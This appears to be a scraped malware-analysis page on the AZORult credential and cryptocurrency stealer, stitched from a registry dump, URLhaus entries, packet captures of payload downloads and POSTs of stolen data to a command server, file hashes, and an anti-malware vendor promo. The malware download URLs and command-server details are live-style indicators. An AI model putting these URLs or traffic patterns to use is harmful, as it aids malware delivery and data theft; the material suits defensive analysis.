HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer(default) = “MSWinsock.Winsock.1”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0(default) = “Microsoft Winsock Control 6.0 (SP5)”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS(default) = “2”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR(default) = “”

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and such that has been setup by cybercriminals for the sole purpose of serving malware.

Database Entry


ID:286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status:Offline
Host: f0384177.xsph[.]ru
Date added:2020-01-11 10:33:04 UTC
Threat: Malware download

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
E….q@…S/..V..P.n…P…*.WWkP.@).A..GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.p.N..P.n..V..P…WWk….P…d…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: “16ea00-59c3a4efb28b9”
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
E…..@….
..V……..PU.wZ.^3eP.@)….GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
E..(J>@.+..0……V..P…^3eU.x.P………….
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
E…J?@.+..{……V..P…^3eU.x.P…….HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806



…….. …….. ……………………

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….|..V….”…. …Ae=
P.@)D…….y…u..^..S:i0..Z..o..i…..\c/u.E~ ……./.5…
….. .
.2.8…….4…………..index.from.sh……….
…………..
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….{..V….”….Py.*:..kP.@)$-……y…u..^..S ..mX..x.C+)8.w<.J..6-….U;…./.5… ….. . .2.8…….4…………..index.from.sh………. ………….. 2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
E..(.8@.+……”..V………….P….0……..
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
E….9@.+……”..V………….P…/…….Y…U…at7.GRB..V.b…-.IK[Gs..&s…hO /.NQ….|.wX……v….E..c.A”.F…………………………..q0..m0..U…….. .b.h5.?…….0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0…180312000000Z..200311235959Z0s1!0…U….Domain Control Validated1 0…U….Hosted by OnlineNic Inc1.0…U….PositiveSSL1.0…U….index.from.sh0..”0.. *.Hs………….0..
……..2Y
2s..v@…………..h2.m}..(.6...&......?s...Z).:....C..:....i.....-.E.r..]....e.6j.....;>...>.[.....5P[ .[.n....:..4. ...S...k...........?x......_...+..b.QU$1..Q..@...F....e&..."...^.....o3....f........g...4......smX>h...d....b!C.;. .G....P5.l.X............0...0...U.#..0.....j:.Z.....Vs.C.:(..0...U.......#k..=.k....R.$.E...0...U...........0...U.......0.0...U.%..0...+.........+.......0O..U. .H0F0:..+.....1....0+0)..+.........https://secure.comodo.com/CPS0...g.....0T..U...M0K0I.G.E.Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0....+........y0w0O..+.....0..Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$..+.....0...http://ocsp.comodoca.com0+..U...$0"..index.from.sh..www.index.from.sh0.. *.H.............c-.[.....p5..(]n.....-..2}.. .A(.?..'...O.,.X2.5d.4N.f.m......7..............Y>.X..G.F-....D.v....&Y....Y%......l.Cq...*1&.D.....>6.S...(>.....~!....Fs....C.39*.....p.k....u....h...A....Y...gmX............<M.p...gr 2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460 E....:@.+......"..V........}....P.......[.Y....Y.V....%..<…..pm.Zl…..)s….C….0…0……….+.n..u6l..n..|..0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1+0)..U…”COMODO RSA Certification Authority0…140212000000Z..290211235959Z0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0..”0.. .H………….0.. ………..Y..85.,….I.d..b.E.:………..mw……..>….I…..K.. …^e.>..L…E^R/4.H$d.A…..g…z.S.;|…Uo.G |..”……W.p.`…-……..{...(!.Mo.O%..z5.&.F…Y5..N.CP?Y..lQ!.X…uPx>L…..k…;…R…$.n.’QE.p.%C…J…~..m…’s].E0….A…D………………..e0..a0…U.#..0…..~.=…<….8…22.0…U……..j:.Z…..Vs.C.:(..0…U………..0…U…….0…….0…U.%..0…+………+…….0…U. ..0.0…U. .0…g…..0L..U…E0C0A.?.=.;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q..+……..e0c0;..+…..0../http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$..+…..0…http://ocsp.comodoca.com0.. *.H………….N+vO..b6..w.’….D…>..ff.>.I..5…….5..6.u…Pr|..w….. ..g..V.{.D.B..]..PF….Yl…….:B…K4{‘;..o$;r.ctX<.l?O…….7

AZORult Rultazo PuffStealer Cryptocurrency Malware Crimeware PCAP file download Traffic Sample

AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Type Stealer Origin ex-USSR
First seen 1 January, 2016 Last seen 16 January, 2020

Also known as PuffStealer Rultazo

The Trojan-PSW.Win32.Azorult is considered dangerous by lots of security experts.

GridinSoft Anti-Malware

THANK YOU!DOWNLOAD NOW On Going Offer

What Trojan-PSW.Win32.Azorult virus can do?

  • Executable code extraction
  • Creates RWX memory
  • HTTP traffic contains suspicious features which may be indicative of malware related traffic
  • Performs some HTTP requests
  • Unconventionial language used in binary resources: Farsi
  • The binary likely contains encrypted or compressed data.
  • Collects information to fingerprint the system
  • Anomalous binary characteristics

Related domains:

khaliddib398.xyz

How to determine Trojan-PSW.Win32.Azorult?

File Info:
crc32: F7C07C00
md5: a2e85c38491fd50c51557cd99748edab
name: him.exe
sha1: 52f3710027b010d418ebd232f0674f88ab5107f6
sha256: 51723411106486dba27a08d0ac93308bb4722e07ee87be574821e8d370699e2a
sha512: 7cc8b75799bd6ae1e1dac56260736b3d52a18168dad76ac82e1c1c0183d603c3118075e021539232f36351301dc01e552d1f77c5031e4ede08d6330e2fe1ce1e
ssdeep: 3072:HqUbL9xr60GRV8L1ogVxnyXeM1HpkAlF5U8nIQ/F7ZHWAAfnH:nbL9x+WL13V97upCSIQ7ufH
type: PE32 executable (GUI) Intel 80386, for MS Windows

URLhaus Database

You are currently viewing the URLhaus database entry for http://khaliddib398.xyz/him.exe which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and such that has been setup by cybercriminals for the sole purpose of serving malware.

Database Entry


ID:286968
URL: http://khaliddib398.xyz/him.exe
URL Status: Online
Host: khaliddib398[.]xyz
Date added:2020-01-13 10:18:07 UTC
Threat: Malware download

2020-01-16 06:39:35.774113 IP 192.168.86.25.56313 > 45.143.138.58.80: Flags [P.], seq 1:507, ack 1, win 16425, length 506: HTTP: GET /him.exe HTTP/1.1
E..”..@….Q..V.-..:…P…..dfuP.@)X…GET /him.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=114742-
Unless-Modified-Since: Mon, 13 Jan 2020 20:20:02 GMT
If-Range: “39800-59c0b33451988”
Host: khaliddib398.xyz
Connection: Keep-Alive

2020-01-16 06:39:35.928724 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], ack 507, win 11, length 0
E..(..@.+..C-..:..V..P…dfu….P…co……..
2020-01-16 06:39:35.947882 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], seq 1:1461, ack 507, win 11, length 1460: HTTP: HTTP/1.1 206 Partial Content
E…..@.+…-..:..V..P…dfu….P…….HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 16 Jan 2020 11:39:36 GMT
Content-Type: application/octet-stream
Content-Length: 120778
Connection: keep-alive
Last-Modified: Mon, 13 Jan 2020 20:20:02 GMT
ETag: “39800-59c0b33451988”
Accept-Ranges: bytes
Content-Range: bytes 114742-235519/235520

2020-01-16 06:39:39.675330 IP 192.168.86.25.56297 > 23.12.144.167.80: Flags [R.], seq 1165498645, ack 1141672289, win 0, length 0
E..(..@…/G..V……..PEx..D..aP….&……..
2020-01-16 06:39:39.675478 IP 192.168.86.25.56294 > 23.12.144.167.80: Flags [R.], seq 2669052771, ack 1221014750, win 0, length 0
E..(..@…/F..V……..P…cH.4.P…u………
2020-01-16 06:39:39.675480 IP 192.168.86.25.56312 > 172.217.9.195.80: Flags [R.], seq 23004971, ack 674304303, win 0, length 0
E..(..@… ..V… ….P..+(1./P….?…….. 2020-01-16 06:39:39.675482 IP 192.168.86.25.56308 > 72.21.91.29.80: Flags [R.], seq 916649304, ack 837624765, win 0, length 0 E..(..@…3…V.H.[….P6..X1.#.P…………. 2020-01-16 06:39:39.675484 IP 192.168.86.25.56299 > 23.12.144.174.80: Flags [R.], seq 1681878668, ack 3512185746, win 0, length 0 E..(..@…/<..V……..Pd?n..W..P….b…….. 2020-01-16 06:39:39.675486 IP 192.168.86.25.56298 > 23.12.144.174.80: Flags [R.], seq 1921844081, ack 3009432550, win 0, length 0 E..(..@…/;..V……..Pr..q.`K.P…………. 2020-01-16 06:39:39.675488 IP 192.168.86.25.56301 > 23.12.144.174.80: Flags [R.], seq 2522849219, ack 478444119, win 0, length 0 E..(..@…/:..V……..P.….zWP…H………
2020-01-16 06:39:39.675860 IP 192.168.86.25.56300 > 23.12.144.174.80: Flags [R.], seq 65075930, ack 835518470, win 0, length 0
E..(..@…/9..V……..P….1…P………….
2020-01-16 06:39:39.675862 IP 192.168.86.25.56302 > 23.12.144.174.80: Flags [R.], seq 3804738166, ack 3857432750, win 0, length 0
E..(..@…/8..V……..P…v….P….<…….. 2020-01-16 06:39:39.750343 IP 40.89.186.10.443 > 192.168.86.25.56291: Flags [P.], seq 940547127:940547164, ack 2485647412, win 287, length 37
E..M.p@.+.^.(Y.
..V…..8..7.’.4P…j……. ..b..f…B.;.P.sP:C..u:u.!o4._m.
2020-01-16 06:39:39.751337 IP 40.89.186.10.443 > 192.168.86.25.56291: Flags [F.], seq 37, ack 1, win 287, length 0
E..(.q@.+.^9(Y.
..V…..8…’.4P…w(……..
2020-01-16 06:39:39.751495 IP 192.168.86.25.56291 > 40.89.186.10.443: Flags [.], ack 38, win 16209, length 0
E..(..@…….V.(Y.
…..’.48..]P.?Q8………
2020-01-16 06:39:40.348332 IP 45.143.138.58.80 > 192.168.86.25.56313: Flags [.], ack 507, win 11, length 0
E..(.C@.+…-..:..V..P…e.j….P….x……..
2020-01-16 06:39:40.348538 IP 192.168.86.25.56313 > 45.143.138.58.80: Flags [.], ack 91639, win 0, length 0
E..(..@….’..V.-..:…P…..e.kP………….
2020-01-16 06:39:41.095474 IP 192.168.86.25.56291 > 40.89.186.10.443: Flags [R.], seq 1, ack 38, win 0, length 0
E..(..@…….V.(Y.

2020-01-16 06:42:13.506473 IP 192.168.86.25.56314 > 45.143.138.58.80: Flags [P.], seq 1:275, ack 1, win 16425, length 274: HTTP: POST /index.php HTTP/1.1
E..:.9@…….V.-..:…P….)..^P.@).2..POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: khaliddib398.xyz
Content-Length: 111
Cache-Control: no-cache

…G..0c.0d.&f.&f.&f.&g.&f.&f.&f.&f.&f.&f.Fp.4p.Gp.2p.0p.1..0a.0c.0`.&g.&f.&f.&f.G..&f.@p.G..&f.&f.&f.&f.&f.&f.
2020-01-16 06:42:13.697644 IP 45.143.138.58.80 > 192.168.86.25.56314: Flags [.], ack 275, win 11, length 0
E..(..@.+…-..:..V..P..)..^….P………….
2020-01-16 06:42:14.240164 IP 45.143.138.58.80 > 192.168.86.25.56314: Flags [.], seq 1:1461, ack 275, win 11, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.+…-..:..V..P..)..^….P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jan 2020 11:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

2020-01-16 06:42:22.681342 IP 192.168.86.25.56315 > 45.143.138.58.80: Flags [P.], seq 1:166, ack 1, win 16425, length 165: HTTP: POST /index.php HTTP/1.1
E…..@…….V.-..:…P^.Y..a..P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: khaliddib398.xyz
Content-Length: 80967
Cache-Control: no-cache